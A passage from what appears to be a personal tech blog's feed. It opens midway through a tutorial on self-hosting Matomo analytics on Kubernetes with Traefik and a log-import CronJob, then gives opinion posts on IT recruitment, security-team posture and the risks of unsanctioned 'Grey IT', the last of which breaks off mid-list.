        - name: MATOMO_DATABASE_PASSWORD
          value: &quot;matomo&quot;
        - name: MATOMO_DATABASE_DBNAME
          value: &quot;matomo&quot;
        volumeMounts:
        - name: matomo-storage
          mountPath: /var/www/html/config
      - name: mysql
        volumeMounts:
        - name : mysql-storage
          mountPath: /var/lib/mysql
        image: mysql:8.0.23
        imagePullPolicy: Always
        ports:
        - containerPort: 3306
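        # this port stays internal to the pod: no Service exposes it,
        # so only the Matomo container can reach MySQL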
        env:
        - name: MYSQL_ROOT_PASSWORD
          value: &quot;matomo&quot;
        - name: MYSQL_DATABASE
          value: &quot;matomo&quot;
        resources:
          limits:
            cpu: &quot;0.2&quot;
            memory: &quot;512Mi&quot;
      volumes:
      - name: mysql-storage
        hostPath:
          path: /home/kube/matomo/content/mysql
          type: Directory
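      # hostPath ties the data to a single node; for a highly available
      # setup, a PersistentVolumeClaim would be needed instead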
      - name: matomo-storage
        hostPath:
          path: /home/kube/matomo/content/matomo
          type: Directory</code></pre><p>We find, first of all, the Matomo container, based on an Apache image.</p><p>It has the following configuration:</p><ul><li>A binding on port 80 of the pod</li><li>The database configuration. In my example, I do not need a strong password, because the database is dedicated to Matomo and only reachable by it.</li><li>Persistent storage, which lets Matomo store its configuration locally (in particular the database configuration). This setup is not valid for a high-availability deployment, as I use local storage.</li></ul><p>Then we have a second container carrying the MySQL database, with the following configuration:</p><ul><li>The database logins and passwords</li><li>The binding of port 3306 inside the pod only, so it is reachable only by Matomo</li><li>Persistent storage: I do not want to lose my data at the slightest reboot. Once again, this setup is not valid for a high-availability deployment.</li></ul><p>Then we have a Service, which will allow us to expose Matomo:</p><pre><code class="language-yaml">kind: Service
apiVersion: v1
metadata:
  labels:
    app: matomo
  name: matomo
spec:
  type: ClusterIP
  ports:
  - port: 80
    name: http
  selector:
    app: matomo
</code></pre><p>Nothing transcendent here: I simply bind port 80 of my pod to a Kubernetes ClusterIP.</p><p>Finally, I declare the IngressRoute; this is what will allow Traefik to route traffic to my pod.</p><pre><code class="language-yaml">apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: matomo-tls
  namespace: default
spec:
  entryPoints:
    - websecure
  routes:
  - kind: Rule
    match: Host(`matomo.tferdinand.net`)
    services:
    - name: matomo
      port: 80
    middlewares:
      - name: security
  tls:
    certResolver: le
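    # assumption: &quot;le&quot; is a certificate resolver (e.g. Let&apos;s Encrypt)
    # declared in the Traefik static configuration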
    options:
      name: mytlsoption
      namespace: default
---
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
  name: matomo
  namespace: default
spec:
  entryPoints:
    - web
  routes:
  - kind: Rule
    match: Host(`matomo.tferdinand.net`)
    services:
    - name: matomo
      port: 80
    middlewares:
      - name: security
      - name: redirectscheme
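      # the redirectscheme middleware is what redirects plain HTTP
      # requests to the HTTPS entrypoint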
</code></pre><p>We find here 2 blocks, one in HTTP and one in https, with an automatic redirection from one to the other.</p><p>Then, we can see that I assign the DNS record &quot;matomo.tferdinand.net&quot; to this one.</p><p>Finally, I apply the same security patterns that I had described in one of my previous posts.</p><p>I can now apply my 3 configurations.</p><h2 id="configuring-matomo">Configuring Matomo</h2><h3 id="configuring-the-server">Configuring the server</h3><p>By connecting to the address declared in Traefik, you should see the installation wizard.</p><p>It will guide you step by step to :</p><ul><li>Configure your database</li><li>Configure your first administrator user</li><li>Configure your first site</li></ul><p>You can see all the steps below:</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/1.png" width="1330" height="452" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/1.png 1000w, https://en.tferdinand.net/content/images/2022/01/1.png 1330w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/2.png" width="968" height="855" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/2.png 600w, https://en.tferdinand.net/content/images/2022/01/2.png 968w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/3.png" width="1315" height="836" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/3.png 600w, 
https://en.tferdinand.net/content/images/size/w1000/2022/01/3.png 1000w, https://en.tferdinand.net/content/images/2022/01/3.png 1315w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/4.png" width="1319" height="464" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/4.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/4.png 1000w, https://en.tferdinand.net/content/images/2022/01/4.png 1319w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/5.png" width="1319" height="861" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/5.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/5.png 1000w, https://en.tferdinand.net/content/images/2022/01/5.png 1319w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/6.png" width="1319" height="744" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/6.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/6.png 1000w, https://en.tferdinand.net/content/images/2022/01/6.png 1319w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/7.png" width="1320" height="1265" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/7.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/7.png 1000w, https://en.tferdinand.net/content/images/2022/01/7.png 1320w" sizes="(min-width: 720px) 720px"></div><div 
class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/8.png" width="1305" height="1051" loading="lazy" alt="OpenSource Traefik ratings with Matomo" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/8.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/8.png 1000w, https://en.tferdinand.net/content/images/2022/01/8.png 1305w" sizes="(min-width: 720px) 720px"></div></div></div></figure><h3 id="integrate-the-js-tracker">Integrate the JS tracker</h3><p>As you could see, Matomo works via a JavaScript tracker that you integrate into your website.</p><p>It is this tracker that interacts with the visitor&apos;s browser to collect the necessary information.</p><p>To activate Matomo on my site, I just have to integrate this snippet. In the case of Ghost, my blogging platform, there is a setting for that under &quot;Code injection&quot; &gt; &quot;Site headers&quot;.</p><p>When you connect to the Matomo interface, you should see some traffic, bearing in mind that:</p><ul><li>Browsers sending the DNT (Do Not Track) header will not send any information (Brave, for example)</li><li>From an RGPD perspective, you must obtain the user&apos;s consent before collecting their information and placing a cookie on their computer.
Matomo provides a guide to this (<a href="https://fr.matomo.org/docs/gdpr/?ref=en.tferdinand.net">https://matomo.org/docs/gdpr/</a>).</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-2-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1000" height="355" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-2-1.png 600w, https://en.tferdinand.net/content/images/2022/01/image-2-1.png 1000w" sizes="(min-width: 720px) 720px"></figure><h2 id="to-go-further">To go further</h2><p>It is also possible, as mentioned above, to feed Matomo from log files.</p><p>A Python script shipped in the Matomo image performs this import; it understands well-known log formats and also lets you define custom ones.</p><p>To use this script, there are two prerequisites:</p><ul><li>Python 3.x</li><li>PHP 7.x</li></ul><p>However, while the image used above is indeed based on the official PHP image, as can be seen in the GitHub repository, it does not have Python installed.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/matomo-org/docker/blob/master/Dockerfile-debian.template?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">docker/Dockerfile-debian.template at master &#xB7; matomo-org/docker</div><div class="kg-bookmark-description">Official Docker project for Matomo Analytics.
Contribute to matomo-org/docker development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">matomo-org</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/c71f536666508d2b9724b067e1858fe78bf8ff20e7ccb6e7e2e100bd06037549/matomo-org/docker" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>If you want to use this script, there are two solutions:</p><ul><li>Create a custom image containing both Python and PHP for this script</li><li>Start from the official image and add Python, like this:</li></ul><pre><code class="language-dockerfile">FROM matomo:4.1.1-apache
RUN apt-get update \
	&amp;&amp; apt-get install -y --no-install-recommends python3
RUN apt-get purge -y --auto-remove &amp;&amp; rm -rf /var/lib/apt/lists/*</code></pre><p>The script is then easy to use, as described in the official documentation:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://fr.matomo.org/docs/log-analytics-tool-how-to/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">How to use Log Analytics tool - Analytics Platform - Matomo</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://static.matomo.org/wp-content/uploads/2018/11/cropped-DefaultIcon-270x270.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">Analytics Platform - Matomo</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://static.matomo.org/wp-content/uploads/2018/11/feature.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>Regarding authentication, three solutions are possible. The first: if the script runs inside the image that hosts the application, it can read the configuration files directly and connect on its own.</p><p>The second solution is to create a token and pass it with the --token-auth switch; this token can be created from the Matomo interface.
To do so, click the cog in the top-right corner, then &quot;Security&quot; and &quot;Create a new token&quot;.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-3-1.png" class="kg-image" alt="OpenSource Traefik ratings with Matomo" loading="lazy" width="1000" height="487" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-3-1.png 600w, https://en.tferdinand.net/content/images/2022/01/image-3-1.png 1000w" sizes="(min-width: 720px) 720px"></figure><p>Be careful: the token can only be retrieved once, so do not forget to store it somewhere secure.</p><p>Finally, the third solution, which <strong>I strongly advise against</strong>, is to pass a login and password directly on the command line.</p><h2 id="importing-logs-with-a-kubernetes-cronjob">Importing logs with a Kubernetes cronjob</h2><p>For my part, I chose to import the logs using a Kubernetes cronjob.</p><p>Indeed, I decided not to deploy the JavaScript tracker, which I find too intrusive for you, my visitors. Instead, I analyze the raw logs produced by Traefik.</p><p>I also chose not to use the official image for this purpose, and I use token authentication.</p><h3 id="the-image">The image</h3><p>The Docker image I used is quite basic:</p><pre><code class="language-dockerfile">FROM python:3.8.7-buster
RUN apt-get update \
	&amp;&amp; apt-get install -y --no-install-recommends git \
	&amp;&amp; git clone https://github.com/matomo-org/matomo-log-analytics.git \
	&amp;&amp; rm -rf /var/lib/apt/lists/*
</code></pre><p>I start from a Python 3.8 image (the importer is only compatible with certain Python versions), then clone the associated repository.</p><p>You can get the prebuilt image directly from Docker Hub:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://hub.docker.com/r/tferdinand/matomo-log-importer?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Docker Hub</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://hub.docker.com/favicon.ico" alt="OpenSource Traefik ratings with Matomo"></div></div></a></figure><h3 id="the-job">The job</h3><p>I chose to put my Traefik logs in a directory that I can mount when I need it.</p><p>To learn more about the logging configuration, I invite you to read my article on the subject:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/extraction-of-traefik-accesslogs-and-dashboard-creation/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Extraction of Traefik accesslogs and dashboard creation</div><div class="kg-bookmark-description">A few weeks ago, I wrote an article explaining the migration from Traefik 1 to Traefik 2, but this time I propose to address a crucial point in the implementation of an application, its monitoring.
This article explains how I set up my dashboarding, it doesn&#x2019;t explain in any case</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://en.tferdinand.net/favicon.png" alt="OpenSource Traefik ratings with Matomo"><span class="kg-bookmark-author">TFerdinand.net</span><span class="kg-bookmark-publisher">Teddy FERDINAND</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://en.tferdinand.net/content/images/2019/12/traefik_banner2.png" alt="OpenSource Traefik ratings with Matomo"></div></a></figure><p>I then created a Kubernetes cronjob, which will allow me to read the logs at regular intervals to integrate them into Matomo.</p><pre><code class="language-yaml">apiVersion: batch/v1
kind: CronJob
metadata:
  name: matomo-importer
spec:
  schedule: &quot;5 * * * *&quot;
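  # fires at minute 5 of every hour; the job then processes
  # the previous hour&apos;s log entries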
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: matomo-importer
            image: tferdinand/matomo-log-importer:1.0.0
            imagePullPolicy: IfNotPresent
            env:
              - name: PROCESSING_DATE
                value: $(date -d &quot;1 hour ago&quot; &quot;+%d/%b/%Y:%H&quot;)
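                # note: Kubernetes does not evaluate this $(date ...) itself; the
                # $(PROCESSING_DATE) reference in the command below is expanded to
                # this literal string, and bash performs the substitution at runtime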
              - name: TOKEN
                value: &quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&quot;
              - name: TRAEFIK_INGRESS_ID
                value: &quot;default-traefik-web-ui-tls-c463f039d72c55f0aca6&quot;
              - name: ID_SITE
                value: &quot;1&quot;
            command:
            - /bin/bash
            - -c
            - grep $(TRAEFIK_INGRESS_ID) /tmp/access.log | grep $(PROCESSING_DATE) &gt; /tmp/matomo_$(ID_SITE).log; python matomo-log-analytics/import_logs.py  --url=https://matomo.tferdinand.net --idsite=$(ID_SITE) --debug --token-auth $(TOKEN) --log-format-name=common /tmp/matomo_$(ID_SITE).log
            volumeMounts:
            - name: shared-storage
              mountPath: /tmp/
          restartPolicy: OnFailure
          volumes:
            - name: shared-storage
              hostPath:
                path: /home/kube/share/from_traefik
                type: Directory
</code></pre><p>I run this task once an hour, to process the previous hour.</p><p>The &quot;grep&quot; at the beginning lets me keep only the log lines of the service I want, since the Matomo log importer cannot filter the Traefik log format in a more refined way.</p><p>ID_SITE indicates the site ID in Matomo, 1 by default.</p><p>So, every hour, I can follow the site&apos;s traffic without impacting my users. Note that it is possible to go down to the minute by adjusting the parameters.</p><h2 id="in-conclusion">In conclusion</h2><p>Matomo is a reliable alternative that is more respectful of your users, and it is entirely possible to consider it in a professional environment.</p><p>If you need richer statistics for your site, this solution is inherently better for your users than Google Analytics.</p><p>Moreover, hosting the solution yourself also makes it easier to comply with the constraints of the RGPD.
The openness of the code also guarantees that no third party exploitation of the data is made.</p><p>I also insist on the fact that not all sites need complete tracking, for my part, a simple exploitation of the logs allows me to get consistent data.</p>]]></content:encoded></item><item><title><![CDATA[[IT] Salary is not the only recruitment criteria]]></title><description><![CDATA[<p>Because of my professional background, I&#x2019;ve worked for a lot of companies, either as a service provider or internally.</p><p>Salary is often:</p><ul><li>A taboo subject, you should not talk about the salary you receive and even less with your colleagues</li><li>Seen as the only criterion for recruiting: If</li></ul>]]></description><link>https://en.tferdinand.net/it-salary-is-not-the-only-recruitment-criteria/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56f</guid><category><![CDATA[Point of view]]></category><category><![CDATA[Job]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 08 Feb 2021 07:07:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image.jpg" alt="[IT] Salary is not the only recruitment criteria"><p>Because of my professional background, I&#x2019;ve worked for a lot of companies, either as a service provider or internally.</p><p>Salary is often:</p><ul><li>A taboo subject, you should not talk about the salary you receive and even less with your colleagues</li><li>Seen as the only criterion for recruiting: If we don&#x2019;t recruit, it&#x2019;s because we don&#x2019;t pay enough, if employees leave, it&#x2019;s because of the salary</li></ul><p>Today, I give you my vision on this point.</p><h2 id="the-salary-is-an-important-criterion%E2%80%A6">The salary is an important criterion&#x2026;</h2><p>Like many I think, I work to earn money. 
To say that salary is not a criterion for choosing a company would be hypocritical on my part.</p><p>Clearly, the salary a company offers me is one of the points I look at. However, for me it is only one criterion among others.</p><p>In the past, I had the opportunity to work in many different sectors and company sizes:</p><ul><li>Retail: Carrefour, Fnac, Conforama</li><li>Industry: L&#x2019;Or&#xE9;al</li><li>Banking: ING Commercial Banking, Soci&#xE9;t&#xE9; G&#xE9;n&#xE9;rale</li><li>Media: M&#xE9;diam&#xE9;trie, Groupe SeLoger</li></ul><p>All this to say that besides the salary, this range also allowed me to see which sectors interest me and which are not for me.</p><p>It is also thanks to this that I understood that I prefer working in smaller structures rather than big multinationals.</p><p>In IT, concerning salary, keep in mind that you often earn more in an SSII/ESN. However, the world of service provision is more &#x201C;mobile&#x201D;: you change context regularly, and that does not suit everyone.</p><h2 id="%E2%80%A6-but-far-from-being-the-only-one">&#x2026; but far from being the only one</h2><p>It is indeed important to be paid according to the work done and its quality; that is undeniable.</p><p>However, limiting the choice of a company to the salary it offers is simplistic.</p><h3 id="the-general-atmosphere">The general atmosphere</h3><p>Being in a company with a healthy general atmosphere is just as important. I&#x2019;m not talking about table soccer and croissants, but about an atmosphere that is healthy for your mind.</p><p>As an anecdote, during one of my former missions, I was shocked by a situation: I was on the client&#x2019;s floor, surrounded by internal teams, and some people could not communicate other than through insults or aggression. I even saw one person crying in the open space!
Atmosphere!</p><p>This allowed me to see that this is not what I am looking for, and to tell myself that being in a healthy work environment is essential for me.</p><h3 id="feeling-valued">Feeling valued</h3><p>I am one of those people who believe that in technical positions, it is important that the work you do is valued. We are often &#x201C;men (and women, of course) behind the scenes&#x201D;, and when a project is successful, the technical teams that made it possible are rarely put forward.</p><p>There are several ways to do this for me:</p><ul><li>The salary increase (this seems logical)</li><li>Saying it! (we often forget this detail)</li><li>Share the success, for example by doing communications to explain what the team did</li><li>Highlight it on a technical blog</li></ul><p>The last point is important to me. More and more companies are setting up technical blogs, even if it&#x2019;s not their core business. Why? Because it allows them to highlight the skills they cultivate internally, but not only, a technical blog is also a perfect showcase for recruiting. Be careful, though, it is important that the author is highlighted in these articles, and not necessarily the company (even though the goal is visibility for the company)</p><p>At WeScale, my current employer, this also manifests itself with the WeTribute, once a month, we receive a form through which we can thank several colleagues. Once a quarter, all these thanks are compiled and sent and the three most thanked (excluding management) share a bonus. Being recognized by your peers is important and I must admit that receiving these messages once a quarter is always heartwarming!</p><h3 id="knowing-where-you%E2%80%99re-going">Knowing where you&#x2019;re going</h3><p>The reason I left some companies was the captainless ship syndrome. You know, that feeling that you&#x2019;re sailing with the waves, but no one has set a clear course.</p><p>From my point of view, it&#x2019;s a frustrating situation. 
I like to know where the company I&#x2019;m in is going. This requires communication: explaining the company&#x2019;s choices, sharing a roadmap (even a very &#x201C;big picture&#x201D; one)&#x2026; Basically, having a clearly defined direction.</p><p>But it also involves a point that is often forgotten: the career plan. I&#x2019;m one of those people who need to be able to project themselves and say, &#x201C;OK, if I stay x years in the company, how can I evolve?&#x201D; Personally, I need to know that I won&#x2019;t be doing the same thing every day until I quit.</p><p>Having visibility on possible evolutions is just as important as the salary.</p><h3 id="you-are-very-kind-but-how-do-i-recruit">You are very kind, but how do I recruit?</h3><p>I&#x2019;m not an expert in human resources, far from it; it&#x2019;s a job that requires a lot of psychology and empathy, and I don&#x2019;t intend to take a position on those subjects.</p><p>However, I am one of those on the other side, and I can give my point of view.</p><p>First of all, stop putting forward your table soccer, rest room and co.; I am applying for a job, not a summer camp!</p><p>Then, don&#x2019;t focus only on the salary, but on what&#x2019;s around it. I have turned down offers with a 50% salary increase because the work environment was not for me. Paying a lot of money to people who won&#x2019;t stay because of the work environment actually costs you more (training time, continuous recruitment, demotivating team turnover, etc.)!</p><p>Levers like telecommuting, for example, are nowadays also points of interest.</p><p>Today, it is important to offer healthy working conditions to be able to recruit.
Don&#x2019;t forget, for the same salary, candidates will always go where they feel most comfortable.</p>]]></content:encoded></item><item><title><![CDATA[For an effective security posture]]></title><description><![CDATA[<p>I&#x2019;ve been working in the IT field for more than 10 years now and I&#x2019;ve worked with a lot of &#x201C;security&#x201D; teams within the companies I&#x2019;ve been in. I&#x2019;ve been a security guy (Cloud Security Architect) for a little over</p>]]></description><link>https://en.tferdinand.net/for-an-effective-security-posture/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56e</guid><category><![CDATA[Security]]></category><category><![CDATA[Point of view]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Team Building]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 01 Feb 2021 06:57:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--2-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--2-.jpg" alt="For an effective security posture"><p>I&#x2019;ve been working in the IT field for more than 10 years now and I&#x2019;ve worked with a lot of &#x201C;security&#x201D; teams within the companies I&#x2019;ve been in. I&#x2019;ve been a security guy (Cloud Security Architect) for a little over a year now.</p><p>During these years, I often noticed a blocking posture of the security teams, sometimes even disconnected from the field, leading to slowdowns and tensions in the projects.</p><p>Today, I&#x2019;m going to present you the posture I chose to adopt and explain why. 
I will also give you my point of view, with a little hindsight, after one year.</p><h2 id="a-little-background">A little background</h2><p>In most of the companies I&#x2019;ve worked for, security is often a mandatory checkpoint, but not necessarily a useful or efficient one&#x2026; let me explain.</p><p>Often, this team is called upon at the end of the chain to:</p><ul><li>Perform a penetration test on an infrastructure</li><li>Verify that the deliverable is compliant</li><li>Grant specific exemptions (&#x201C;passe-droits&#x201D;)</li></ul><p>Moreover, we avoid soliciting them as much as possible, because we know the response time will be long, often measured in weeks.</p><p>To add another layer, I have often had to deal with people disconnected from the reality of the field concerning:</p><ul><li>the cybersecurity maturity of the implementation teams</li><li>tooling</li><li>business needs</li><li>delivery times</li></ul><p>In other words, we often end up with a dialogue of the deaf, each side not understanding the other.</p><p>When I arrived on my current mission, a barrier existed between dev/ops and security. The former did not understand the point of the measures being implemented.</p><p>This barrier creates resistance to change and therefore slows the teams down, in addition to creating a not particularly pleasant atmosphere.</p><h2 id="coming-down-from-the-ivory-tower">Coming down from the ivory tower</h2><p>One of the major issues, as I mentioned earlier, is the disconnect between the operations (DevOps) teams and security.</p><p>One of the first things I managed to put in place to improve this situation was to organize regular check-ins between myself and the ops.</p><p>In this model, the ops team is an &#x201C;ambassador&#x201D; for security. This doesn&#x2019;t mean that I don&#x2019;t talk with the development teams, but rather that a SPOC (Single Point Of Contact) must be designated.
Humanly speaking, I can&#x2019;t talk directly to 200 people.</p><p>Indeed, the purpose of this point is mainly to be bidirectional. This allows:</p><ul><li>Security can present its roadmap in advance of the phase, by explaining it</li><li>That the teams can bring up their concerns, needs or current blockages as soon as possible</li><li>Generally speaking, this improves communication between entities</li></ul><p>Moreover, taking into account the feedback from the &#x201C;field&#x201D; teams also allows adjusting as much as possible the tools or the security rules that are being implemented.</p><p>Be careful, however, the goal is not to justify the choices, but to explain them. You must therefore be in a pedagogical posture, and not be defensive or defensive.</p><h2 id="zero-trust-%E2%80%A6-yes-but-not-only">Zero trust &#x2026; yes, but not only!</h2><p>I am a fan of the zero trust model (a blog post on the subject is coming soon); however, I am among those who consider it a model, a target to reach, not an immediate objective.</p><p>The concern I have often seen is an inconsistent posture on this subject:</p><ul><li>Hardening too much: we prevent teams from working by putting too strong a technical framework (for example, by not giving any autonomy on a software installation)</li><li>Not being able to adapt a rule if it is too rigid (e.g., network filtering, or an incompatible protocol)</li><li>Being in a blocking mode on a project, preventing any delivery</li></ul><p>My approach is more to say that we need to understand the technical and operational constraints of the teams to see how we can best apply zero trust.</p><p>This means:</p><ul><li>That I sometimes tolerate giving more rights than necessary temporarily to allow projects to progress</li><li>That it is necessary to trust the teams</li><li>That we must show that we are available to answer questions, and that we are in a constructive approach, the goal is to find a solution</li></ul><h2 
id="supporting-projects-rather-than-blocking-them">Supporting projects rather than blocking them</h2><p>This is the point I often insist on. In my mind, security is meant to support projects as well as possible. The idea is therefore:</p><ul><li>To document upstream as much as possible, so that the information is shared</li><li>To be available to help the teams</li><li>To listen to the needs of the teams</li><li>To have a benevolent approach</li><li>To be in an advisory role rather than a &#x201C;finished work inspector&#x201D;</li></ul><p>As you will have understood, I fully embrace a DevSecOps approach, which, from my point of view, is what makes it possible to be efficient.</p><p>Positioning oneself as a coach also saves time: by becoming a full-fledged project actor, you get listened to and can ensure that security needs are taken into account as early as possible in the projects.</p><p>Adopting this posture also turns the teams into allies rather than adversaries to be fought.</p><p>This also requires a lot of communication; as I often say, a large part of my daily work is explaining and documenting. The clearer and more accessible the information, the more readily the associated rules will be adopted.</p><p>This also means that a CISO must know how to surround himself with technical people in order to best support the teams. As a reminder, the role of CISO is not so much technical as organizational.</p><h2 id="in-conclusion">In conclusion</h2><p>I apply to myself the rules I mentioned earlier, and I must admit that in one year, I have seen the direct benefits:</p><ul><li>I am consulted at the beginning of new projects to see what points of attention I can bring</li><li>Security decisions are understood (not necessarily accepted, but the objective is understood)</li><li>I am no longer seen as a blocking point</li></ul><p>My approach probably comes from my background as an Ops person, which means that I myself have been on the other side of the fence. 
I am therefore better able to understand the problems that teams in the field may face.</p><p>This does not mean that everything is rosy: there will always be dissatisfied people, but instead of being brought in at the end of the chain, I have become an actor in the projects.</p>]]></content:encoded></item><item><title><![CDATA[The danger of Grey IT in companies]]></title><description><![CDATA[<p>Lockdowns have changed our work habits a lot. Telecommuting has become much more common than it was just a year ago.</p><p>With telecommuting rolled out very quickly, new risks have appeared. Today, I suggest talking about Grey IT.</p><h2 id="what-is-grey-it">What is Grey IT?</h2><p>In a company, in a classical</p>]]></description><link>https://en.tferdinand.net/the-danger-of-grey-it-in-companies/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56d</guid><category><![CDATA[Security]]></category><category><![CDATA[Point of view]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 18 Jan 2021 07:48:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--1-.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image--1-.jpg" alt="The danger of Grey IT in companies"><p>Lockdowns have changed our work habits a lot. Telecommuting has become much more common than it was just a year ago.</p><p>With telecommuting rolled out very quickly, new risks have appeared. 
Today, I suggest talking about Grey IT.</p><h2 id="what-is-grey-it">What is Grey IT?</h2><p>In a company, in a classical way, the applications used are referenced in a service catalog.</p><p>For example, if your company uses Slack, the IT department knows it, and will configure this application so that it works with the company&#x2019;s security and confidentiality standards.</p><p>But before the app is even installed, it is first reviewed:</p><ul><li>By legal: the goal here is to check the terms of use, to see if any usage could be detrimental to the company, such as the information put into the app becoming public or no longer belonging to your company</li><li>By security: the goal here is to check the application&#x2019;s compliance with the security standards of your IS. It also means analyzing the code if necessary or launching analyses (malware, known CVEs, etc.)</li><li>By accounting: an application always has a cost, visible or not (I will come back to this point), and it is important to see whether this cost is acceptable in relation to your budget, or whether the need is not already covered by another application that you already have</li></ul><p>Grey IT is precisely the practice of bypassing these processes, which are often perceived as restrictive.</p><p>Their purpose, however, is to secure your business; from the outside, they can be seen as heavy and slow. Typically, to take my Slack example, I may have a need that Slack does not meet today, like having a whiteboard.</p><p>So, to meet my need, I create a personal Gmail account to use Google Meet and share whiteboards with my colleagues. 
Don&#x2019;t worry, it&#x2019;s free!</p><h2 id="if-it%E2%80%99s-free-it-means-you-are-the-product">If it&#x2019;s free, it means you are the product</h2><p>My previous example is the case I&#x2019;ve often come across: I have a need, a free product meets it, I take the product.</p><p>But here&#x2019;s the thing: developing professional applications cannot be improvised, and although there are of course open source solutions hosted by their communities, these remain marginal next to the many applications whose publishers have the means to be more visible.</p><p>To take Gmail again, Google is not a non-profit organization. Their business is your data, your usage, your habits. That is how Google makes money while offering you a free service.</p><p>For some it will be a &#x201C;freemium&#x201D; model, like Slack, which has a free offer that quickly shows its limits in a business context.</p><p>That&#x2019;s why you have to study the business model and the contractual terms carefully before choosing an application, because it can sometimes backfire. Providing data about your business to a third-party company can:</p><ul><li>Be dangerous (for example in terms of GDPR data)</li><li>Allow this company to exploit this idea in your place</li><li>Help this company grow on the back of your work</li></ul><h2 id="why-is-this-a-danger">Why is this a danger?</h2><p>Using non-referenced applications poses several concerns:</p><ul><li>Creation of a parallel IS</li><li>Added security risks from &#x201C;exotic&#x201D; applications</li><li>Added confidentiality risks</li><li>An increased overall budget, as several entities may purchase applications with overlapping needs, but on a smaller scale, without benefiting from volume pricing. 
